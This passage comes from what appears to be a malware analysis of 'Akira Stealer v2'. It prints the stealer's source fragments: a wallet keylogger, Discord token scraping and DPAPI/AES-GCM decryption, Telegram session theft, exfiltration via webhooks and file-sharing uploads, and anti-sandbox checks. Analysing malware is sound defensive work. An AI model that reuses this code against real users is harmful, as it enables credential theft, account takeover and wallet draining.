__init__(self, wallet_titles):\n self.buf = \"\"\n keyboard.on_release(self.capture)\n self.wallet_titles = wallet_titles\n\n def capture(self, event):\n title = pygetwindow.getActiveWindow().title\n if any(w in title for w in self.wallet_titles):\n if event.name == 'enter':\n data = f\"Keys:{self.buf}\\nClip:{pyperclip.paste()}\"\n send_to_webhook(data)\n self.buf = \"\"\n else:\n self.buf += event.name\n",[1524,14323,14324,14329,14333,14338,14343,14348,14353,14358,14362,14367,14372,14377,14382,14387,14392,14397,14402],{"__ignoreMap":863},[1588,14325,14326],{"class":1590,"line":1591},[1588,14327,14328],{},"import keyboard, pyperclip\n",[1588,14330,14331],{"class":1590,"line":864},[1588,14332,9865],{"emptyLinePlaceholder":508},[1588,14334,14335],{"class":1590,"line":1814},[1588,14336,14337],{},"class WalletKeylogger:\n",[1588,14339,14340],{"class":1590,"line":1831},[1588,14341,14342],{}," def __init__(self, wallet_titles):\n",[1588,14344,14345],{"class":1590,"line":2135},[1588,14346,14347],{}," self.buf = \"\"\n",[1588,14349,14350],{"class":1590,"line":2141},[1588,14351,14352],{}," keyboard.on_release(self.capture)\n",[1588,14354,14355],{"class":1590,"line":2147},[1588,14356,14357],{}," self.wallet_titles = wallet_titles\n",[1588,14359,14360],{"class":1590,"line":2153},[1588,14361,9865],{"emptyLinePlaceholder":508},[1588,14363,14364],{"class":1590,"line":2159},[1588,14365,14366],{}," def capture(self, event):\n",[1588,14368,14369],{"class":1590,"line":2165},[1588,14370,14371],{}," title = pygetwindow.getActiveWindow().title\n",[1588,14373,14374],{"class":1590,"line":11039},[1588,14375,14376],{}," if any(w in title for w in self.wallet_titles):\n",[1588,14378,14379],{"class":1590,"line":11045},[1588,14380,14381],{}," if event.name == 'enter':\n",[1588,14383,14384],{"class":1590,"line":11051},[1588,14385,14386],{}," data = f\"Keys:{self.buf}\\nClip:{pyperclip.paste()}\"\n",[1588,14388,14389],{"class":1590,"line":11057},[1588,14390,14391],{}," send_to_webhook(data)\n",[1588,14393,14394],{"class":1590,"line":11063},[1588,14395,14396],{}," self.buf = \"\"\n",[1588,14398,14399],{"class":1590,"line":11069},[1588,14400,14401],{}," else:\n",[1588,14403,14404],{"class":1590,"line":11075},[1588,14405,14406],{}," self.buf += event.name\n",[2738,14408,14409,14415],{},[2741,14410,14411,14414],{},[1736,14412,14413],{},"Trigger list",": Window titles including “MetaMask”, “Phantom”, “Atomic Wallet”, etc.",[2741,14416,14417,14420],{},[1736,14418,14419],{},"Clipboard",": Captures copied seeds or private keys.",[1671,14422,14424],{"id":14423},"_786-packaging-exfiltration","7.8.6 Packaging & Exfiltration",[806,14426,1677],{},[806,14428,14429],{},"After collecting browser data, credentials, wallet information, and tokens, Akira proceeds to consolidate and exfiltrate the loot in a highly automated and stealthy manner. This stage marks the final step in the infection chain, and it’s optimized for reliability and minimal forensic footprint. First, all collected data—including browser dumps, logs, and keylogged wallet information—is compressed into a ZIP archive. This ensures the full dataset can be transferred as a single payload. The archive is then uploaded to multiple public file-sharing services such as GoFile, File.io, or Oshi.at, depending on availability. These platforms provide anonymous, temporary hosting, and are often used to bypass corporate firewalls or reputation-based blocking. A structured report is simultaneously generated and sent to the attacker via a Discord or Telegram webhook. It includes summary statistics—how many wallets were found, how many tokens were valid, and a direct link to the stolen data. This gives attackers a quick overview of the target’s value without opening the archive.",[806,14431,14432],{},"Finally, the malware deletes the temporary folder and the archive from disk, effectively removing local forensic evidence. By the time a defender discovers the infection, the data is already gone—and often irretrievable.",[1545,14434,14436],{"className":10501,"code":14435,"language":10503,"meta":863,"style":863},"# 1) ZIP everything (including Wallets folder)\nzip_path = shutil.make_archive(Utils.get_temp_folder(), 'zip', Utils.get_temp_folder())\n# 2) Attempt upload to primary & fallback services\nurl = Webhook.uploadToGofile(zip_path) or Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n# 3) Report summary\nembed = {\n \"title\": \"💰 Wallet & Token Exfiltration Report\",\n \"fields\": [\n {\"name\": \"Extension Wallets\", \"value\": data.ext_wallets_count},\n {\"name\": \"Desktop Wallets\", \"value\": data.desktop_wallets_count},\n {\"name\": \"Discord Tokens\", \"value\": len(valid_tokens)},\n {\"name\": \"Telegram Sessions\", \"value\": data.has_telegram},\n {\"name\": \"Archive Link\", \"value\": url or \"[upload failed]\"},\n ]\n}\nWebhook.sendDataTG(Utils.get_temp_folder(), chatId, startup)\n# 4) Cleanup local folder & ZIP\nUtils.clear_client_folder()\n",[1524,14437,14438,14443,14448,14453,14458,14463,14468,14473,14478,14483,14488,14493,14498,14503,14508,14512,14517,14522],{"__ignoreMap":863},[1588,14439,14440],{"class":1590,"line":1591},[1588,14441,14442],{},"# 1) ZIP everything (including Wallets folder)\n",[1588,14444,14445],{"class":1590,"line":864},[1588,14446,14447],{},"zip_path = shutil.make_archive(Utils.get_temp_folder(), 'zip', Utils.get_temp_folder())\n",[1588,14449,14450],{"class":1590,"line":1814},[1588,14451,14452],{},"# 2) Attempt upload to primary & fallback services\n",[1588,14454,14455],{"class":1590,"line":1831},[1588,14456,14457],{},"url = Webhook.uploadToGofile(zip_path) or Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n",[1588,14459,14460],{"class":1590,"line":2135},[1588,14461,14462],{},"# 3) Report summary\n",[1588,14464,14465],{"class":1590,"line":2141},[1588,14466,14467],{},"embed = {\n",[1588,14469,14470],{"class":1590,"line":2147},[1588,14471,14472],{}," \"title\": \"💰 Wallet & Token Exfiltration Report\",\n",[1588,14474,14475],{"class":1590,"line":2153},[1588,14476,14477],{}," \"fields\": [\n",[1588,14479,14480],{"class":1590,"line":2159},[1588,14481,14482],{}," {\"name\": \"Extension Wallets\", \"value\": data.ext_wallets_count},\n",[1588,14484,14485],{"class":1590,"line":2165},[1588,14486,14487],{}," {\"name\": \"Desktop Wallets\", \"value\": data.desktop_wallets_count},\n",[1588,14489,14490],{"class":1590,"line":11039},[1588,14491,14492],{}," {\"name\": \"Discord Tokens\", \"value\": len(valid_tokens)},\n",[1588,14494,14495],{"class":1590,"line":11045},[1588,14496,14497],{}," {\"name\": \"Telegram Sessions\", \"value\": data.has_telegram},\n",[1588,14499,14500],{"class":1590,"line":11051},[1588,14501,14502],{}," {\"name\": \"Archive Link\", \"value\": url or \"[upload failed]\"},\n",[1588,14504,14505],{"class":1590,"line":11057},[1588,14506,14507],{}," ]\n",[1588,14509,14510],{"class":1590,"line":11063},[1588,14511,8430],{},[1588,14513,14514],{"class":1590,"line":11069},[1588,14515,14516],{},"Webhook.sendDataTG(Utils.get_temp_folder(), chatId, startup)\n",[1588,14518,14519],{"class":1590,"line":11075},[1588,14520,14521],{},"# 4) Cleanup local folder & ZIP\n",[1588,14523,14524],{"class":1590,"line":11081},[1588,14525,13708],{},[810,14527,14529,14530,2772],{"id":14528},"_79-discord-and-telegram-token-theft-class-discord","7.9. Discord and Telegram Token Theft (Class: ",[1524,14531,7358],{},[806,14533,1536],{},[806,14535,14536,14537,14539],{},"Akira Stealer v2’s ",[1736,14538,7358],{}," class executes a highly parallelized, multi-stage process to harvest both Discord authorization tokens and Telegram session data. Below, we dissect each component with precise code references and illustrative examples.",[1671,14541,14543],{"id":14542},"_791-initialization-path-enumeration","7.9.1 Initialization & Path Enumeration",[806,14545,1677],{},[806,14547,14548],{},"Upon instantiation, the constructor builds two sets of target paths:",[1545,14550,14552],{"className":10501,"code":14551,"language":10503,"meta":863,"style":863},"# Discord client LevelDB directories\ndiscord_paths = [\n [f\"{self.ROAMING}/Discord\", \"/Local Storage/leveldb\"],\n [f\"{self.ROAMING}/Lightcord\", \"/Local Storage/leveldb\"],\n ...\n]\n\n# Chromium-based browser LevelDB directories\nbrowserPaths = [\n [f\"{self.ROAMING}/Opera Software/Opera GX Stable\", \"opera.exe\", \"/Local Storage/leveldb\", ...],\n [f\"{self.LOCAL}/Google/Chrome/User Data\", \"chrome.exe\", \"/Default/Local Storage/leveldb\", ...],\n ...\n]\n",[1524,14553,14554,14559,14564,14569,14574,14578,14582,14586,14591,14596,14601,14606,14610],{"__ignoreMap":863},[1588,14555,14556],{"class":1590,"line":1591},[1588,14557,14558],{},"# Discord client LevelDB directories\n",[1588,14560,14561],{"class":1590,"line":864},[1588,14562,14563],{},"discord_paths = [\n",[1588,14565,14566],{"class":1590,"line":1814},[1588,14567,14568],{}," [f\"{self.ROAMING}/Discord\", \"/Local Storage/leveldb\"],\n",[1588,14570,14571],{"class":1590,"line":1831},[1588,14572,14573],{}," [f\"{self.ROAMING}/Lightcord\", \"/Local Storage/leveldb\"],\n",[1588,14575,14576],{"class":1590,"line":2135},[1588,14577,9855],{},[1588,14579,14580],{"class":1590,"line":2141},[1588,14581,13933],{},[1588,14583,14584],{"class":1590,"line":2147},[1588,14585,9865],{"emptyLinePlaceholder":508},[1588,14587,14588],{"class":1590,"line":2153},[1588,14589,14590],{},"# Chromium-based browser LevelDB directories\n",[1588,14592,14593],{"class":1590,"line":2159},[1588,14594,14595],{},"browserPaths = [\n",[1588,14597,14598],{"class":1590,"line":2165},[1588,14599,14600],{}," [f\"{self.ROAMING}/Opera Software/Opera GX Stable\", \"opera.exe\", \"/Local Storage/leveldb\", ...],\n",[1588,14602,14603],{"class":1590,"line":11039},[1588,14604,14605],{}," [f\"{self.LOCAL}/Google/Chrome/User Data\", \"chrome.exe\", \"/Default/Local Storage/leveldb\", ...],\n",[1588,14607,14608],{"class":1590,"line":11045},[1588,14609,9855],{},[1588,14611,14612],{"class":1590,"line":11051},[1588,14613,13933],{},[2738,14615,14616,14625],{},[2741,14617,14618,14621,14622,2786],{},[1736,14619,14620],{},"Discord Paths"," target official and unofficial Discord clients under ",[1524,14623,14624],{},"%APPDATA%",[2741,14626,14627,14630],{},[1736,14628,14629],{},"Browser Paths"," cover popular browsers’ user data folders, including subfolders for local storage and extensions.",[806,14632,14633],{},"Threads are spawned for each entry:",[1545,14635,14637],{"className":10501,"code":14636,"language":10503,"meta":863,"style":863},"for patt in browserPaths:\n t = Thread(target=self.get_btoken, args=[patt[0], patt[2]])\n t.start()\nfor patt in discord_paths:\n t = Thread(target=self.get_discord, args=[patt[0], patt[1]])\n t.start()\n",[1524,14638,14639,14644,14649,14654,14659,14664],{"__ignoreMap":863},[1588,14640,14641],{"class":1590,"line":1591},[1588,14642,14643],{},"for patt in browserPaths:\n",[1588,14645,14646],{"class":1590,"line":864},[1588,14647,14648],{}," t = Thread(target=self.get_btoken, args=[patt[0], patt[2]])\n",[1588,14650,14651],{"class":1590,"line":1814},[1588,14652,14653],{}," t.start()\n",[1588,14655,14656],{"class":1590,"line":1831},[1588,14657,14658],{},"for patt in discord_paths:\n",[1588,14660,14661],{"class":1590,"line":2135},[1588,14662,14663],{}," t = Thread(target=self.get_discord, args=[patt[0], patt[1]])\n",[1588,14665,14666],{"class":1590,"line":2141},[1588,14667,14653],{},[806,14669,14670],{},"This threading model maximizes I/O throughput, probing dozens of directories concurrently.",[1671,14672,14674],{"id":14673},"_792-token-extraction-logic","7.9.2 Token Extraction Logic",[806,14676,1677],{},[806,14678,14679],{},[1736,14680,14681],{},"Plaintext Token Scraping from Browsers",[806,14683,14684,14687,14688,5611,14691,14694],{},[1524,14685,14686],{},"get_btoken(path, arg)"," navigates to each LevelDB folder and inspects ",[1524,14689,14690],{},".log",[1524,14692,14693],{},".ldb"," files:",[1545,14696,14698],{"className":10501,"code":14697,"language":10503,"meta":863,"style":863},"for file in os.listdir(path + arg):\n if file.endswith((\".log\", \".ldb\")):\n for line in open(f\"{path}{arg}/{file}\", errors=\"ignore\"):\n for regex in (r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\", r\"mfa\\.[\\w-]{80,95}\"):\n tokens = re.findall(regex, line)\n for token in tokens:\n self.tokens.append(token)\n self.cehckToken(token)\n",[1524,14699,14700,14705,14710,14715,14720,14725,14730,14735],{"__ignoreMap":863},[1588,14701,14702],{"class":1590,"line":1591},[1588,14703,14704],{},"for file in os.listdir(path + arg):\n",[1588,14706,14707],{"class":1590,"line":864},[1588,14708,14709],{}," if file.endswith((\".log\", \".ldb\")):\n",[1588,14711,14712],{"class":1590,"line":1814},[1588,14713,14714],{}," for line in open(f\"{path}{arg}/{file}\", errors=\"ignore\"):\n",[1588,14716,14717],{"class":1590,"line":1831},[1588,14718,14719],{}," for regex in (r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\", r\"mfa\\.[\\w-]{80,95}\"):\n",[1588,14721,14722],{"class":1590,"line":2135},[1588,14723,14724],{}," tokens = re.findall(regex, line)\n",[1588,14726,14727],{"class":1590,"line":2141},[1588,14728,14729],{}," for token in tokens:\n",[1588,14731,14732],{"class":1590,"line":2147},[1588,14733,14734],{}," self.tokens.append(token)\n",[1588,14736,14737],{"class":1590,"line":2153},[1588,14738,14739],{}," self.cehckToken(token)\n",[2738,14741,14742,14751,14759],{},[2741,14743,14744,14750],{},[1736,14745,14746,14747],{},"Regex ",[1524,14748,14749],{},"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}"," matches standard Discord tokens.",[2741,14752,14753,14758],{},[1736,14754,14746,14755],{},[1524,14756,14757],{},"mfa\\.[\\w-]{80,95}"," captures MFA tokens.",[2741,14760,14761,14762,14765],{},"Deduplication is implicit: tokens stored in ",[1524,14763,14764],{},"self.tokens"," before validation.",[806,14767,14768],{},[1736,14769,14770],{},"Encrypted Token Decryption in Discord Client",[806,14772,14773,14774,4966,14776,14778,14779,14782],{},"Discord’s client encrypts Local Storage entries under DPAPI, prefaced by ",[1524,14775,12511],{},[1524,14777,12514],{},". ",[1524,14780,14781],{},"get_discord(path, arg)"," handles this:",[1545,14784,14786],{"className":10501,"code":14785,"language":10503,"meta":863,"style":863},"# Read Local State to obtain encrypted master key\nwith open(path + \"/Local State\", 'r') as f:\n local_state = json.load(f)\nencrypted_key = b64decode(local_state['os_crypt']['encrypted_key'])[5:]\nmaster_key = self.CryptUnprotectData(encrypted_key)\n\n# Iterate LevelDB files for Base64 payloads\nfor file in os.listdir(path + arg):\n if file.endswith((\".log\", \".ldb\")):\n for line in open(f\"{path}{arg}/{file}\"):\n for token_part in re.findall(r\"dQw4w9WgXcQ:([A-Za-z0-9+/=]+)\", line):\n ciphertext = b64decode(token_part)\n token = self.decrypt_value(ciphertext, master_key)\n self.tokens.append(token)\n self.cehckToken(token)\n",[1524,14787,14788,14793,14798,14802,14807,14812,14816,14821,14825,14829,14834,14839,14844,14849,14854],{"__ignoreMap":863},[1588,14789,14790],{"class":1590,"line":1591},[1588,14791,14792],{},"# Read Local State to obtain encrypted master key\n",[1588,14794,14795],{"class":1590,"line":864},[1588,14796,14797],{},"with open(path + \"/Local State\", 'r') as f:\n",[1588,14799,14800],{"class":1590,"line":1814},[1588,14801,13109],{},[1588,14803,14804],{"class":1590,"line":1831},[1588,14805,14806],{},"encrypted_key = b64decode(local_state['os_crypt']['encrypted_key'])[5:]\n",[1588,14808,14809],{"class":1590,"line":2135},[1588,14810,14811],{},"master_key = self.CryptUnprotectData(encrypted_key)\n",[1588,14813,14814],{"class":1590,"line":2141},[1588,14815,9865],{"emptyLinePlaceholder":508},[1588,14817,14818],{"class":1590,"line":2147},[1588,14819,14820],{},"# Iterate LevelDB files for Base64 payloads\n",[1588,14822,14823],{"class":1590,"line":2153},[1588,14824,14704],{},[1588,14826,14827],{"class":1590,"line":2159},[1588,14828,14709],{},[1588,14830,14831],{"class":1590,"line":2165},[1588,14832,14833],{}," for line in open(f\"{path}{arg}/{file}\"):\n",[1588,14835,14836],{"class":1590,"line":11039},[1588,14837,14838],{}," for token_part in re.findall(r\"dQw4w9WgXcQ:([A-Za-z0-9+/=]+)\", line):\n",[1588,14840,14841],{"class":1590,"line":11045},[1588,14842,14843],{}," ciphertext = b64decode(token_part)\n",[1588,14845,14846],{"class":1590,"line":11051},[1588,14847,14848],{}," token = self.decrypt_value(ciphertext, master_key)\n",[1588,14850,14851],{"class":1590,"line":11057},[1588,14852,14853],{}," self.tokens.append(token)\n",[1588,14855,14856],{"class":1590,"line":11063},[1588,14857,14858],{}," self.cehckToken(token)\n",[2738,14860,14861,14870],{},[2741,14862,14863,14866,14867,14869],{},[1736,14864,14865],{},"Master Key Recovery",": Strips the 5-byte DPAPI header, then calls ",[1524,14868,13175],{}," (wrapping Windows DPAPI) to decrypt the AES-GCM key.",[2741,14871,14872,14875,14876,14879,14880,14883,14884],{},[1736,14873,14874],{},"Payload Parsing",": Tokens are prefixed with ",[1524,14877,14878],{},"dQw4w9WgXcQ:"," (an attacker-chosen marker). After Base64 decoding, ",[1524,14881,14882],{},"decrypt_value()"," splits IV and ciphertext:",[1545,14885,14887],{"className":10501,"code":14886,"language":10503,"meta":863,"style":863},"def decrypt\\_value(buff, master\\_key):\niv = buff\\[3:15]\npayload = buff\\[15:]\ncipher = AES.new(master\\_key, AES.MODE\\_GCM, iv)\nreturn cipher.decrypt(payload)\\[:-16].decode()\n",[1524,14888,14889,14894,14899,14904,14909],{"__ignoreMap":863},[1588,14890,14891],{"class":1590,"line":1591},[1588,14892,14893],{},"def decrypt\\_value(buff, master\\_key):\n",[1588,14895,14896],{"class":1590,"line":864},[1588,14897,14898],{},"iv = buff\\[3:15]\n",[1588,14900,14901],{"class":1590,"line":1814},[1588,14902,14903],{},"payload = buff\\[15:]\n",[1588,14905,14906],{"class":1590,"line":1831},[1588,14907,14908],{},"cipher = AES.new(master\\_key, AES.MODE\\_GCM, iv)\n",[1588,14910,14911],{"class":1590,"line":2135},[1588,14912,14913],{},"return cipher.decrypt(payload)\\[:-16].decode()\n",[1671,14915,14917],{"id":14916},"_793-token-validation-exfiltration","7.9.3 Token Validation & Exfiltration",[806,14919,1677],{},[806,14921,14922],{},"Each extracted token is validated via live API call:",[1545,14924,14927],{"className":14925,"code":14926,"language":916},[1548],"headers = {\"Authorization\": token}\nresp = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=headers)\nif resp.status_code == 200:\n self.cehckToken(token)\n",[1524,14928,14926],{"__ignoreMap":863},[2738,14930,14931],{},[2741,14932,14933,2289,14936,14939,14940,14943,14944],{},[1736,14934,14935],{},"On success",[1524,14937,14938],{},"cehckToken()"," determines whether to send via Telegram (",[1524,14941,14942],{},"useTg=True",") or Discord webhook:",[1545,14945,14947],{"className":10501,"code":14946,"language":10503,"meta":863,"style":863},"if useTg:\nself.sendTokenTg(token)\nelse:\nself.send\\_embed(token)\n",[1524,14948,14949,14954,14959,14964],{"__ignoreMap":863},[1588,14950,14951],{"class":1590,"line":1591},[1588,14952,14953],{},"if useTg:\n",[1588,14955,14956],{"class":1590,"line":864},[1588,14957,14958],{},"self.sendTokenTg(token)\n",[1588,14960,14961],{"class":1590,"line":1814},[1588,14962,14963],{},"else:\n",[1588,14965,14966],{"class":1590,"line":1831},[1588,14967,14968],{},"self.send\\_embed(token)\n",[2738,14970,14971],{},[2741,14972,14973,14978],{},[1736,14974,14975],{},[1524,14976,14977],{},"send_embed"," crafts a rich Discord embed containing user metadata (username, discriminator, email, Nitro status, billing info) using fields from",[1545,14980,14983],{"className":14981,"code":14982,"language":916},[1548],"user_json = requests.get(...).json()\nusername = user_json[\"username\"]\nid = user_json[\"id\"]\n# embed fields: token, email, phone, IP, flags, Nitro, billing\n",[1524,14984,14982],{"__ignoreMap":863},[2738,14986,14987],{},[2741,14988,14989,14994],{},[1736,14990,14991],{},[1524,14992,14993],{},"sendTokenTg"," sends a plain-text summary over Telegram API.",[1671,14996,14998],{"id":14997},"_794-telegram-session-harvesting","7.9.4 Telegram Session Harvesting",[806,15000,1677],{},[806,15002,15003],{},"Beyond Discord tokens, the stealer grabs Telegram Desktop sessions:",[1545,15005,15007],{"className":10501,"code":15006,"language":10503,"meta":863,"style":863},"@staticmethod\ndef steal_telegram():\n src = f\"{os.getenv('APPDATA')}/Telegram Desktop/tdata\"\n Utils.TaskKill(\"telegram.exe\")\n shutil.copytree(src, os.path.join(Utils.get_temp_folder(), \"Telegram\"))\n",[1524,15008,15009,15013,15018,15023,15028],{"__ignoreMap":863},[1588,15010,15011],{"class":1590,"line":1591},[1588,15012,10991],{},[1588,15014,15015],{"class":1590,"line":864},[1588,15016,15017],{},"def steal_telegram():\n",[1588,15019,15020],{"class":1590,"line":1814},[1588,15021,15022],{}," src = f\"{os.getenv('APPDATA')}/Telegram Desktop/tdata\"\n",[1588,15024,15025],{"class":1590,"line":1831},[1588,15026,15027],{}," Utils.TaskKill(\"telegram.exe\")\n",[1588,15029,15030],{"class":1590,"line":2135},[1588,15031,15032],{}," shutil.copytree(src, os.path.join(Utils.get_temp_folder(), \"Telegram\"))\n",[2738,15034,15035,15041,15050],{},[2741,15036,15037,15040],{},[1736,15038,15039],{},"Process Termination",": Ensures file locks are released.",[2741,15042,15043,15046,15047,15049],{},[1736,15044,15045],{},"Recursive Copy",": Steals ",[1524,15048,14284],{}," folder, including user sessions, contacts, and cached messages.",[2741,15051,15052,15054,15055,15058],{},[1736,15053,7374],{},": The stolen folder is zipped and uploaded via ",[1524,15056,15057],{},"sendFilesTG()",", with the download link embedded in a Telegram message.",[806,15060,15061,15062,15064],{},"Akira Stealer’s ",[1524,15063,7358],{}," module combines regex-based scraping, DPAPI-backed AES-GCM decryption, live API validation, and multi-protocol exfiltration (webhook + Telegram) to deliver a seamless account takeover capability across both Discord and Telegram platforms.",[810,15066,15068],{"id":15067},"_710-system-profiling","7.10 System Profiling",[806,15070,1536],{},[806,15072,15073,15074,15077],{},"Akira Stealer v2 incorporates an extensive system profiling phase to gather host metadata, environment attributes, and network details. This information is collated in the ",[1524,15075,15076],{},"Data"," class and later packaged with exfiltrated credentials. Below, we break down the profiling logic with direct code references.",[1671,15079,15081,15082,15084],{"id":15080},"_7101-data-class-initialization","7.10.1 ",[1524,15083,15076],{}," Class Initialization",[806,15086,1677],{},[806,15088,15089,15090,15092],{},"On startup, an instance of ",[1524,15091,15076],{}," is created:",[1545,15094,15096],{"className":10501,"code":15095,"language":10503,"meta":863,"style":863},"class Data:\n def __init__(self):\n self.username = os.getlogin()\n self.computerName = os.getenv(\"computername\") or \"Unable to get computer name\"\n self.system_info = f\"Computer Name: {self.computerName}\\n...\"\n ...\n self.ip = requests.get(url=\"https://api.ipify.org\").text\n ipdata = json.loads(requests.post(url=f\"http://ip-api.com/json/{self.ip}\").text)\n self.country = ipdata.get(\"country\")\n self.countryCode = ipdata.get(\"countryCode\", \"\").lower()\n",[1524,15097,15098,15103,15108,15113,15118,15123,15128,15133,15138,15143],{"__ignoreMap":863},[1588,15099,15100],{"class":1590,"line":1591},[1588,15101,15102],{},"class Data:\n",[1588,15104,15105],{"class":1590,"line":864},[1588,15106,15107],{}," def __init__(self):\n",[1588,15109,15110],{"class":1590,"line":1814},[1588,15111,15112],{}," self.username = os.getlogin()\n",[1588,15114,15115],{"class":1590,"line":1831},[1588,15116,15117],{}," self.computerName = os.getenv(\"computername\") or \"Unable to get computer name\"\n",[1588,15119,15120],{"class":1590,"line":2135},[1588,15121,15122],{}," self.system_info = f\"Computer Name: {self.computerName}\\n...\"\n",[1588,15124,15125],{"class":1590,"line":2141},[1588,15126,15127],{}," ...\n",[1588,15129,15130],{"class":1590,"line":2147},[1588,15131,15132],{}," self.ip = requests.get(url=\"https://api.ipify.org\").text\n",[1588,15134,15135],{"class":1590,"line":2153},[1588,15136,15137],{}," ipdata = json.loads(requests.post(url=f\"http://ip-api.com/json/{self.ip}\").text)\n",[1588,15139,15140],{"class":1590,"line":2159},[1588,15141,15142],{}," self.country = ipdata.get(\"country\")\n",[1588,15144,15145],{"class":1590,"line":2165},[1588,15146,15147],{}," self.countryCode = ipdata.get(\"countryCode\", \"\").lower()\n",[2738,15149,15150,15163],{},[2741,15151,15152,15155,15156,5611,15159,15162],{},[1736,15153,15154],{},"Username & Hostname:"," Retrieved via ",[1524,15157,15158],{},"os.getlogin()",[1524,15160,15161],{},"COMPUTERNAME"," environment variable.",[2741,15164,15165,15168,15169,15172,15173,15175],{},[1736,15166,15167],{},"IP Address:"," Fetched with ",[1524,15170,15171],{},"requests.get(\"https://api.ipify.org\")",", then geolocated via ",[1524,15174,11337],{}," for country and ISO code.",[1671,15177,15179],{"id":15178},"_7102-os-and-hardware-enumeration","7.10.2 OS and Hardware Enumeration",[806,15181,1677],{},[806,15183,15184],{},"Using Windows Management Instrumentation (WMI) commands:",[1545,15186,15188],{"className":10501,"code":15187,"language":10503,"meta":863,"style":863},"# Operating System\nself.computerOS = subprocess.run('wmic os get Caption', shell=True, capture_output=True).stdout\n# Total Physical Memory\nself.totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', ...)\n# BIOS UUID\nself.uuid = subprocess.run('wmic csproduct get uuid', ...)\n# CPU Identifier\nself.cpu = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:System...\\Processor_Identifier'\", ...)\n# GPU Name\nself.gpu = subprocess.run('wmic path win32_VideoController get name', ...)\n# Windows Product Key\nself.productKey = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\\\Microsoft\\\\Windows NT...SoftwareProtectionPlatform' -Name BackupProductKeyDefault\", ...)\n",[1524,15189,15190,15195,15200,15205,15210,15215,15220,15225,15230,15235,15240,15245],{"__ignoreMap":863},[1588,15191,15192],{"class":1590,"line":1591},[1588,15193,15194],{},"# Operating System\n",[1588,15196,15197],{"class":1590,"line":864},[1588,15198,15199],{},"self.computerOS = subprocess.run('wmic os get Caption', shell=True, capture_output=True).stdout\n",[1588,15201,15202],{"class":1590,"line":1814},[1588,15203,15204],{},"# Total Physical Memory\n",[1588,15206,15207],{"class":1590,"line":1831},[1588,15208,15209],{},"self.totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', ...)\n",[1588,15211,15212],{"class":1590,"line":2135},[1588,15213,15214],{},"# BIOS UUID\n",[1588,15216,15217],{"class":1590,"line":2141},[1588,15218,15219],{},"self.uuid = subprocess.run('wmic csproduct get uuid', ...)\n",[1588,15221,15222],{"class":1590,"line":2147},[1588,15223,15224],{},"# CPU Identifier\n",[1588,15226,15227],{"class":1590,"line":2153},[1588,15228,15229],{},"self.cpu = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:System...\\Processor_Identifier'\", ...)\n",[1588,15231,15232],{"class":1590,"line":2159},[1588,15233,15234],{},"# GPU Name\n",[1588,15236,15237],{"class":1590,"line":2165},[1588,15238,15239],{},"self.gpu = subprocess.run('wmic path win32_VideoController get name', ...)\n",[1588,15241,15242],{"class":1590,"line":11039},[1588,15243,15244],{},"# Windows Product Key\n",[1588,15246,15247],{"class":1590,"line":11045},[1588,15248,15249],{},"self.productKey = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\\\Microsoft\\\\Windows NT...SoftwareProtectionPlatform' -Name BackupProductKeyDefault\", ...)\n",[806,15251,15252,15253,15256],{},"Results are parsed to human-readable strings (",[1524,15254,15255],{},"strip()",", index operations) and concatenated into:",[1545,15258,15260],{"className":10501,"code":15259,"language":10503,"meta":863,"style":863},"self.system_info = (\n f\"Computer Name: {self.computerName}\\n\"\n f\"Total Memory: {self.totalMemory}\\n\"\n f\"CPU: {self.cpu}\\n\"\n f\"GPU: {self.gpu}\\n\"\n f\"Product Key: {self.productKey}\"\n)\n",[1524,15261,15262,15267,15272,15277,15282,15287,15292],{"__ignoreMap":863},[1588,15263,15264],{"class":1590,"line":1591},[1588,15265,15266],{},"self.system_info = (\n",[1588,15268,15269],{"class":1590,"line":864},[1588,15270,15271],{}," f\"Computer Name: {self.computerName}\\n\"\n",[1588,15273,15274],{"class":1590,"line":1814},[1588,15275,15276],{}," f\"Total Memory: {self.totalMemory}\\n\"\n",[1588,15278,15279],{"class":1590,"line":1831},[1588,15280,15281],{}," f\"CPU: {self.cpu}\\n\"\n",[1588,15283,15284],{"class":1590,"line":2135},[1588,15285,15286],{}," f\"GPU: {self.gpu}\\n\"\n",[1588,15288,15289],{"class":1590,"line":2141},[1588,15290,15291],{}," f\"Product Key: {self.productKey}\"\n",[1588,15293,15294],{"class":1590,"line":2147},[1588,15295,11258],{},[1671,15297,15299],{"id":15298},"_7103-vm-detection-anti-sandbox-checks","7.10.3 VM Detection & Anti-Sandbox Checks",[806,15301,1677],{},[806,15303,15304,15305,15307],{},"Before deep profiling, the malware invokes ",[1524,15306,10674],{}," to detect virtualization or analysis environments:",[1545,15309,15311],{"className":10501,"code":15310,"language":10503,"meta":863,"style":863},"if VmProtect.isVM(1):\n sys.exit()\n",[1524,15312,15313,15318],{"__ignoreMap":863},[1588,15314,15315],{"class":1590,"line":1591},[1588,15316,15317],{},"if VmProtect.isVM(1):\n",[1588,15319,15320],{"class":1590,"line":864},[1588,15321,15322],{}," sys.exit()\n",[806,15324,15325],{},"Key checks include:",[2738,15327,15328,15334,15340,15346],{},[2741,15329,15330,15333],{},[1736,15331,15332],{},"Registry Keys & Driver Descriptors",": Queries virtualization-related registry entries.",[2741,15335,15336,15339],{},[1736,15337,15338],{},"Blacklisted UUIDs & Computer Names",": Matches against known VM fingerprints.",[2741,15341,15342,15345],{},[1736,15343,15344],{},"HTTP Simulation",": Attempts to connect to a nonexistent domain under HTTPS.",[2741,15347,15348,15351,15352,2289,15355,2289,15358,2786],{},[1736,15349,15350],{},"Process Blacklist",": Spawns a background thread to kill tools like ",[1524,15353,15354],{},"wireshark",[1524,15356,15357],{},"ollydbg",[1524,15359,15360],{},"ida64",[1671,15362,15364],{"id":15363},"_7104-packaging-transmission","7.10.4 Packaging & Transmission",[806,15366,1677],{},[806,15368,15369,15370,15373],{},"The collected ",[1524,15371,15372],{},"system_info",", IP, and country flag are embedded in the webhook payload 